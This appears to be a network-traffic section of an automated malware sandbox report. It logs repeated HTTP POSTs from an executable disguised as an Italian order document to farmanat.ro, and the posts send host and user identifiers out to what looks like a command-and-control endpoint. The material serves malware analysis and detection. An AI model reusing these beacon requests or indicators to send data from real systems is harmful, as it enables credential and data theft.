Nov 25, 2021 10:52:25.303616047 CET	7015	IN	HTTP/1.1 404 Not Found Server: nginx Date: Thu, 25 Nov 2021 09:52:24 GMT Content-Type: text/html; charset=UTF-8 Connection: close Vary: Accept-Encoding X-Powered-By: PHP/7.0.33 X-XSS-Protection: 1; mode=block X-Content-Type-Options: nosniff Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
503	192.168.11.20	50347	176.223.209.128	80	C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe

Timestamp	kBytes transferred	Direction	Data
Nov 25, 2021 10:52:25.690005064 CET	7015	OUT	POST /arman30/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: farmanat.ro Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: F45E6F10 Content-Length: 151 Connection: close
Nov 25, 2021 10:52:25.723462105 CET	7016	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 41 00 72 00 74 00 68 00 75 00 72 00 01 00 0c 00 00 00 34 00 36 00 38 00 33 00 32 00 35 00 01 00 10 00 00 00 57 00 31 00 30 00 36 00 34 00 5f 00 30 00 33 00 80 07 00 00 38 04 00 Data Ascii: (ckav.ruArthur468325W1064_038028278665D4ACB73EF64D459A
Nov 25, 2021 10:52:25.791414976 CET	7016	IN	HTTP/1.1 404 Not Found Server: nginx Date: Thu, 25 Nov 2021 09:52:24 GMT Content-Type: text/html; charset=UTF-8 Connection: close Vary: Accept-Encoding X-Powered-By: PHP/7.0.33 X-XSS-Protection: 1; mode=block X-Content-Type-Options: nosniff Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
504	192.168.11.20	50348	176.223.209.128	80	C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe

Timestamp	kBytes transferred	Direction	Data
Nov 25, 2021 10:52:26.225157022 CET	7017	OUT	POST /arman30/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: farmanat.ro Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: F45E6F10 Content-Length: 151 Connection: close
Nov 25, 2021 10:52:26.259187937 CET	7017	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 41 00 72 00 74 00 68 00 75 00 72 00 01 00 0c 00 00 00 34 00 36 00 38 00 33 00 32 00 35 00 01 00 10 00 00 00 57 00 31 00 30 00 36 00 34 00 5f 00 30 00 33 00 80 07 00 00 38 04 00 Data Ascii: (ckav.ruArthur468325W1064_038028278665D4ACB73EF64D459A
Nov 25, 2021 10:52:26.315299988 CET	7017	IN	HTTP/1.1 404 Not Found Server: nginx Date: Thu, 25 Nov 2021 09:52:25 GMT Content-Type: text/html; charset=UTF-8 Connection: close Vary: Accept-Encoding X-Powered-By: PHP/7.0.33 X-XSS-Protection: 1; mode=block X-Content-Type-Options: nosniff Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
505	192.168.11.20	50349	176.223.209.128	80	C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe

Timestamp	kBytes transferred	Direction	Data
Nov 25, 2021 10:52:26.744009018 CET	7018	OUT	POST /arman30/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: farmanat.ro Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: F45E6F10 Content-Length: 151 Connection: close
Nov 25, 2021 10:52:26.778235912 CET	7018	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 41 00 72 00 74 00 68 00 75 00 72 00 01 00 0c 00 00 00 34 00 36 00 38 00 33 00 32 00 35 00 01 00 10 00 00 00 57 00 31 00 30 00 36 00 34 00 5f 00 30 00 33 00 80 07 00 00 38 04 00 Data Ascii: (ckav.ruArthur468325W1064_038028278665D4ACB73EF64D459A
Nov 25, 2021 10:52:26.827974081 CET	7019	IN	HTTP/1.1 404 Not Found Server: nginx Date: Thu, 25 Nov 2021 09:52:25 GMT Content-Type: text/html; charset=UTF-8 Connection: close Vary: Accept-Encoding X-Powered-By: PHP/7.0.33 X-XSS-Protection: 1; mode=block X-Content-Type-Options: nosniff Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
506	192.168.11.20	50350	176.223.209.128	80	C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe

Timestamp	kBytes transferred	Direction	Data
Nov 25, 2021 10:52:27.252180099 CET	7019	OUT	POST /arman30/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: farmanat.ro Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: F45E6F10 Content-Length: 151 Connection: close
Nov 25, 2021 10:52:27.285602093 CET	7020	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 41 00 72 00 74 00 68 00 75 00 72 00 01 00 0c 00 00 00 34 00 36 00 38 00 33 00 32 00 35 00 01 00 10 00 00 00 57 00 31 00 30 00 36 00 34 00 5f 00 30 00 33 00 80 07 00 00 38 04 00 Data Ascii: (ckav.ruArthur468325W1064_038028278665D4ACB73EF64D459A
Nov 25, 2021 10:52:27.335648060 CET	7020	IN	HTTP/1.1 404 Not Found Server: nginx Date: Thu, 25 Nov 2021 09:52:26 GMT Content-Type: text/html; charset=UTF-8 Connection: close Vary: Accept-Encoding X-Powered-By: PHP/7.0.33 X-XSS-Protection: 1; mode=block X-Content-Type-Options: nosniff Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
507	192.168.11.20	50351	176.223.209.128	80	C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe

Timestamp	kBytes transferred	Direction	Data
Nov 25, 2021 10:52:27.764926910 CET	7021	OUT	POST /arman30/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: farmanat.ro Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: F45E6F10 Content-Length: 151 Connection: close
Nov 25, 2021 10:52:27.799151897 CET	7021	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 41 00 72 00 74 00 68 00 75 00 72 00 01 00 0c 00 00 00 34 00 36 00 38 00 33 00 32 00 35 00 01 00 10 00 00 00 57 00 31 00 30 00 36 00 34 00 5f 00 30 00 33 00 80 07 00 00 38 04 00 Data Ascii: (ckav.ruArthur468325W1064_038028278665D4ACB73EF64D459A
Nov 25, 2021 10:52:27.849395990 CET	7021	IN	HTTP/1.1 404 Not Found Server: nginx Date: Thu, 25 Nov 2021 09:52:26 GMT Content-Type: text/html; charset=UTF-8 Connection: close Vary: Accept-Encoding X-Powered-By: PHP/7.0.33 X-XSS-Protection: 1; mode=block X-Content-Type-Options: nosniff Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
508	192.168.11.20	50352	176.223.209.128	80	C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe

Timestamp	kBytes transferred	Direction	Data
Nov 25, 2021 10:52:28.263374090 CET	7022	OUT	POST /arman30/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: farmanat.ro Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: F45E6F10 Content-Length: 151 Connection: close
Nov 25, 2021 10:52:28.296890974 CET	7022	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 41 00 72 00 74 00 68 00 75 00 72 00 01 00 0c 00 00 00 34 00 36 00 38 00 33 00 32 00 35 00 01 00 10 00 00 00 57 00 31 00 30 00 36 00 34 00 5f 00 30 00 33 00 80 07 00 00 38 04 00 Data Ascii: (ckav.ruArthur468325W1064_038028278665D4ACB73EF64D459A
Nov 25, 2021 10:52:28.348093033 CET	7023	IN	HTTP/1.1 404 Not Found Server: nginx Date: Thu, 25 Nov 2021 09:52:27 GMT Content-Type: text/html; charset=UTF-8 Connection: close Vary: Accept-Encoding X-Powered-By: PHP/7.0.33 X-XSS-Protection: 1; mode=block X-Content-Type-Options: nosniff Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
509	192.168.11.20	50353	176.223.209.128	80	C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe

Timestamp	kBytes transferred	Direction	Data
Nov 25, 2021 10:52:28.747392893 CET	7023	OUT	POST /arman30/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: farmanat.ro Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: F45E6F10 Content-Length: 151 Connection: close
Nov 25, 2021 10:52:28.781620026 CET	7024	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 41 00 72 00 74 00 68 00 75 00 72 00 01 00 0c 00 00 00 34 00 36 00 38 00 33 00 32 00 35 00 01 00 10 00 00 00 57 00 31 00 30 00 36 00 34 00 5f 00 30 00 33 00 80 07 00 00 38 04 00 Data Ascii: (ckav.ruArthur468325W1064_038028278665D4ACB73EF64D459A
Nov 25, 2021 10:52:28.834002972 CET	7024	IN	HTTP/1.1 404 Not Found Server: nginx Date: Thu, 25 Nov 2021 09:52:27 GMT Content-Type: text/html; charset=UTF-8 Connection: close Vary: Accept-Encoding X-Powered-By: PHP/7.0.33 X-XSS-Protection: 1; mode=block X-Content-Type-Options: nosniff Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
51	192.168.11.20	49887	176.223.209.128	80	C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe

Timestamp	kBytes transferred	Direction	Data
Nov 25, 2021 10:48:34.343229055 CET	6380	OUT	POST /arman30/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: farmanat.ro Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: F45E6F10 Content-Length: 151 Connection: close
Nov 25, 2021 10:48:34.377456903 CET	6381	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 41 00 72 00 74 00 68 00 75 00 72 00 01 00 0c 00 00 00 34 00 36 00 38 00 33 00 32 00 35 00 01 00 10 00 00 00 57 00 31 00 30 00 36 00 34 00 5f 00 30 00 33 00 80 07 00 00 38 04 00 Data Ascii: (ckav.ruArthur468325W1064_038028278665D4ACB73EF64D459A
Nov 25, 2021 10:48:34.427978992 CET	6381	IN	HTTP/1.1 404 Not Found Server: nginx Date: Thu, 25 Nov 2021 09:48:33 GMT Content-Type: text/html; charset=UTF-8 Connection: close Vary: Accept-Encoding X-Powered-By: PHP/7.0.33 X-XSS-Protection: 1; mode=block X-Content-Type-Options: nosniff Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
510	192.168.11.20	50354	176.223.209.128	80	C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe

Timestamp	kBytes transferred	Direction	Data
Nov 25, 2021 10:52:29.178594112 CET	7025	OUT	POST /arman30/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: farmanat.ro Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: F45E6F10 Content-Length: 151 Connection: close
Nov 25, 2021 10:52:29.213073015 CET	7025	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 41 00 72 00 74 00 68 00 75 00 72 00 01 00 0c 00 00 00 34 00 36 00 38 00 33 00 32 00 35 00 01 00 10 00 00 00 57 00 31 00 30 00 36 00 34 00 5f 00 30 00 33 00 80 07 00 00 38 04 00 Data Ascii: (ckav.ruArthur468325W1064_038028278665D4ACB73EF64D459A
Nov 25, 2021 10:52:29.265156984 CET	7025	IN	HTTP/1.1 404 Not Found Server: nginx Date: Thu, 25 Nov 2021 09:52:28 GMT Content-Type: text/html; charset=UTF-8 Connection: close Vary: Accept-Encoding X-Powered-By: PHP/7.0.33 X-XSS-Protection: 1; mode=block X-Content-Type-Options: nosniff Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
511	192.168.11.20	50355	176.223.209.128	80	C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe

Timestamp	kBytes transferred	Direction	Data
Nov 25, 2021 10:52:29.689702988 CET	7026	OUT	POST /arman30/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: farmanat.ro Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: F45E6F10 Content-Length: 151 Connection: close
Nov 25, 2021 10:52:29.723548889 CET	7026	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 41 00 72 00 74 00 68 00 75 00 72 00 01 00 0c 00 00 00 34 00 36 00 38 00 33 00 32 00 35 00 01 00 10 00 00 00 57 00 31 00 30 00 36 00 34 00 5f 00 30 00 33 00 80 07 00 00 38 04 00 Data Ascii: (ckav.ruArthur468325W1064_038028278665D4ACB73EF64D459A
Nov 25, 2021 10:52:29.779525995 CET	7027	IN	HTTP/1.1 404 Not Found Server: nginx Date: Thu, 25 Nov 2021 09:52:28 GMT Content-Type: text/html; charset=UTF-8 Connection: close Vary: Accept-Encoding X-Powered-By: PHP/7.0.33 X-XSS-Protection: 1; mode=block X-Content-Type-Options: nosniff Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
512	192.168.11.20	50356	176.223.209.128	80	C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe

Timestamp	kBytes transferred	Direction	Data
Nov 25, 2021 10:52:30.160809040 CET	7027	OUT	POST /arman30/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: farmanat.ro Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: F45E6F10 Content-Length: 151 Connection: close
Nov 25, 2021 10:52:30.194834948 CET	7028	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 41 00 72 00 74 00 68 00 75 00 72 00 01 00 0c 00 00 00 34 00 36 00 38 00 33 00 32 00 35 00 01 00 10 00 00 00 57 00 31 00 30 00 36 00 34 00 5f 00 30 00 33 00 80 07 00 00 38 04 00 Data Ascii: (ckav.ruArthur468325W1064_038028278665D4ACB73EF64D459A
Nov 25, 2021 10:52:30.252974033 CET	7028	IN	HTTP/1.1 404 Not Found Server: nginx Date: Thu, 25 Nov 2021 09:52:29 GMT Content-Type: text/html; charset=UTF-8 Connection: close Vary: Accept-Encoding X-Powered-By: PHP/7.0.33 X-XSS-Protection: 1; mode=block X-Content-Type-Options: nosniff Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
513	192.168.11.20	50357	176.223.209.128	80	C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe

Timestamp	kBytes transferred	Direction	Data
Nov 25, 2021 10:52:30.684075117 CET	7029	OUT	POST /arman30/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: farmanat.ro Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: F45E6F10 Content-Length: 151 Connection: close
Nov 25, 2021 10:52:30.717711926 CET	7029	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 41 00 72 00 74 00 68 00 75 00 72 00 01 00 0c 00 00 00 34 00 36 00 38 00 33 00 32 00 35 00 01 00 10 00 00 00 57 00 31 00 30 00 36 00 34 00 5f 00 30 00 33 00 80 07 00 00 38 04 00 Data Ascii: (ckav.ruArthur468325W1064_038028278665D4ACB73EF64D459A
Nov 25, 2021 10:52:30.771226883 CET	7029	IN	HTTP/1.1 404 Not Found Server: nginx Date: Thu, 25 Nov 2021 09:52:29 GMT Content-Type: text/html; charset=UTF-8 Connection: close Vary: Accept-Encoding X-Powered-By: PHP/7.0.33 X-XSS-Protection: 1; mode=block X-Content-Type-Options: nosniff Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
514	192.168.11.20	50358	176.223.209.128	80	C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe

Timestamp	kBytes transferred	Direction	Data
Nov 25, 2021 10:52:31.132268906 CET	7030	OUT	POST /arman30/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: farmanat.ro Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: F45E6F10 Content-Length: 151 Connection: close
Nov 25, 2021 10:52:31.165750980 CET	7030	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 41 00 72 00 74 00 68 00 75 00 72 00 01 00 0c 00 00 00 34 00 36 00 38 00 33 00 32 00 35 00 01 00 10 00 00 00 57 00 31 00 30 00 36 00 34 00 5f 00 30 00 33 00 80 07 00 00 38 04 00 Data Ascii: (ckav.ruArthur468325W1064_038028278665D4ACB73EF64D459A
Nov 25, 2021 10:52:31.228099108 CET	7031	IN	HTTP/1.1 404 Not Found Server: nginx Date: Thu, 25 Nov 2021 09:52:30 GMT Content-Type: text/html; charset=UTF-8 Connection: close Vary: Accept-Encoding X-Powered-By: PHP/7.0.33 X-XSS-Protection: 1; mode=block X-Content-Type-Options: nosniff Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
515	192.168.11.20	50359	176.223.209.128	80	C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe

Timestamp	kBytes transferred	Direction	Data
Nov 25, 2021 10:52:31.643580914 CET	7031	OUT	POST /arman30/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: farmanat.ro Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: F45E6F10 Content-Length: 151 Connection: close
Nov 25, 2021 10:52:31.677800894 CET	7032	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 41 00 72 00 74 00 68 00 75 00 72 00 01 00 0c 00 00 00 34 00 36 00 38 00 33 00 32 00 35 00 01 00 10 00 00 00 57 00 31 00 30 00 36 00 34 00 5f 00 30 00 33 00 80 07 00 00 38 04 00 Data Ascii: (ckav.ruArthur468325W1064_038028278665D4ACB73EF64D459A
Nov 25, 2021 10:52:31.736886024 CET	7032	IN	HTTP/1.1 404 Not Found Server: nginx Date: Thu, 25 Nov 2021 09:52:30 GMT Content-Type: text/html; charset=UTF-8 Connection: close Vary: Accept-Encoding X-Powered-By: PHP/7.0.33 X-XSS-Protection: 1; mode=block X-Content-Type-Options: nosniff Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
516	192.168.11.20	50360	176.223.209.128	80	C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe

Timestamp	kBytes transferred	Direction	Data
Nov 25, 2021 10:52:32.168792963 CET	7033	OUT	POST /arman30/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: farmanat.ro Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: F45E6F10 Content-Length: 151 Connection: close
Nov 25, 2021 10:52:32.203115940 CET	7033	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 41 00 72 00 74 00 68 00 75 00 72 00 01 00 0c 00 00 00 34 00 36 00 38 00 33 00 32 00 35 00 01 00 10 00 00 00 57 00 31 00 30 00 36 00 34 00 5f 00 30 00 33 00 80 07 00 00 38 04 00 Data Ascii: (ckav.ruArthur468325W1064_038028278665D4ACB73EF64D459A
Nov 25, 2021 10:52:32.253784895 CET	7033	IN	HTTP/1.1 404 Not Found Server: nginx Date: Thu, 25 Nov 2021 09:52:31 GMT Content-Type: text/html; charset=UTF-8 Connection: close Vary: Accept-Encoding X-Powered-By: PHP/7.0.33 X-XSS-Protection: 1; mode=block X-Content-Type-Options: nosniff Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
517	192.168.11.20	50361	176.223.209.128	80	C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe

Timestamp	kBytes transferred	Direction	Data
Nov 25, 2021 10:52:32.703571081 CET	7034	OUT	POST /arman30/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: farmanat.ro Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: F45E6F10 Content-Length: 151 Connection: close
Nov 25, 2021 10:52:32.737766981 CET	7034	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 41 00 72 00 74 00 68 00 75 00 72 00 01 00 0c 00 00 00 34 00 36 00 38 00 33 00 32 00 35 00 01 00 10 00 00 00 57 00 31 00 30 00 36 00 34 00 5f 00 30 00 33 00 80 07 00 00 38 04 00 Data Ascii: (ckav.ruArthur468325W1064_038028278665D4ACB73EF64D459A
Nov 25, 2021 10:52:32.796001911 CET	7035	IN	HTTP/1.1 404 Not Found Server: nginx Date: Thu, 25 Nov 2021 09:52:31 GMT Content-Type: text/html; charset=UTF-8 Connection: close Vary: Accept-Encoding X-Powered-By: PHP/7.0.33 X-XSS-Protection: 1; mode=block X-Content-Type-Options: nosniff Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
518	192.168.11.20	50362	176.223.209.128	80	C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe

Timestamp	kBytes transferred	Direction	Data
Nov 25, 2021 10:52:33.165057898 CET	7035	OUT	POST /arman30/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: farmanat.ro Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: F45E6F10 Content-Length: 151 Connection: close
Nov 25, 2021 10:52:33.198584080 CET	7036	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 41 00 72 00 74 00 68 00 75 00 72 00 01 00 0c 00 00 00 34 00 36 00 38 00 33 00 32 00 35 00 01 00 10 00 00 00 57 00 31 00 30 00 36 00 34 00 5f 00 30 00 33 00 80 07 00 00 38 04 00 Data Ascii: (ckav.ruArthur468325W1064_038028278665D4ACB73EF64D459A
Nov 25, 2021 10:52:33.247881889 CET	7036	IN	HTTP/1.1 404 Not Found Server: nginx Date: Thu, 25 Nov 2021 09:52:32 GMT Content-Type: text/html; charset=UTF-8 Connection: close Vary: Accept-Encoding X-Powered-By: PHP/7.0.33 X-XSS-Protection: 1; mode=block X-Content-Type-Options: nosniff Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
519	192.168.11.20	50363	176.223.209.128	80	C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe

Timestamp	kBytes transferred	Direction	Data
Nov 25, 2021 10:52:33.675960064 CET	7037	OUT	POST /arman30/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: farmanat.ro Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: F45E6F10 Content-Length: 151 Connection: close
Nov 25, 2021 10:52:33.710185051 CET	7037	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 41 00 72 00 74 00 68 00 75 00 72 00 01 00 0c 00 00 00 34 00 36 00 38 00 33 00 32 00 35 00 01 00 10 00 00 00 57 00 31 00 30 00 36 00 34 00 5f 00 30 00 33 00 80 07 00 00 38 04 00 Data Ascii: (ckav.ruArthur468325W1064_038028278665D4ACB73EF64D459A
Nov 25, 2021 10:52:33.761866093 CET	7037	IN	HTTP/1.1 404 Not Found Server: nginx Date: Thu, 25 Nov 2021 09:52:32 GMT Content-Type: text/html; charset=UTF-8 Connection: close Vary: Accept-Encoding X-Powered-By: PHP/7.0.33 X-XSS-Protection: 1; mode=block X-Content-Type-Options: nosniff Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
52	192.168.11.20	49888	176.223.209.128	80	C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe

Timestamp	kBytes transferred	Direction	Data
Nov 25, 2021 10:48:34.941843033 CET	6382	OUT	POST /arman30/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: farmanat.ro Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: F45E6F10 Content-Length: 151 Connection: close
Nov 25, 2021 10:48:34.976138115 CET	6382	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 41 00 72 00 74 00 68 00 75 00 72 00 01 00 0c 00 00 00 34 00 36 00 38 00 33 00 32 00 35 00 01 00 10 00 00 00 57 00 31 00 30 00 36 00 34 00 5f 00 30 00 33 00 80 07 00 00 38 04 00 Data Ascii: (ckav.ruArthur468325W1064_038028278665D4ACB73EF64D459A
Nov 25, 2021 10:48:35.026457071 CET	6382	IN	HTTP/1.1 404 Not Found Server: nginx Date: Thu, 25 Nov 2021 09:48:34 GMT Content-Type: text/html; charset=UTF-8 Connection: close Vary: Accept-Encoding X-Powered-By: PHP/7.0.33 X-XSS-Protection: 1; mode=block X-Content-Type-Options: nosniff Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
520	192.168.11.20	50364	176.223.209.128	80	C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe

Timestamp	kBytes transferred	Direction	Data
Nov 25, 2021 10:52:34.188796043 CET	7038	OUT	POST /arman30/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: farmanat.ro Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: F45E6F10 Content-Length: 151 Connection: close
Nov 25, 2021 10:52:34.223037958 CET	7038	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 41 00 72 00 74 00 68 00 75 00 72 00 01 00 0c 00 00 00 34 00 36 00 38 00 33 00 32 00 35 00 01 00 10 00 00 00 57 00 31 00 30 00 36 00 34 00 5f 00 30 00 33 00 80 07 00 00 38 04 00 Data Ascii: (ckav.ruArthur468325W1064_038028278665D4ACB73EF64D459A
Nov 25, 2021 10:52:34.276300907 CET	7039	IN	HTTP/1.1 404 Not Found Server: nginx Date: Thu, 25 Nov 2021 09:52:33 GMT Content-Type: text/html; charset=UTF-8 Connection: close Vary: Accept-Encoding X-Powered-By: PHP/7.0.33 X-XSS-Protection: 1; mode=block X-Content-Type-Options: nosniff Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
521	192.168.11.20	50365	176.223.209.128	80	C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe

Timestamp	kBytes transferred	Direction	Data
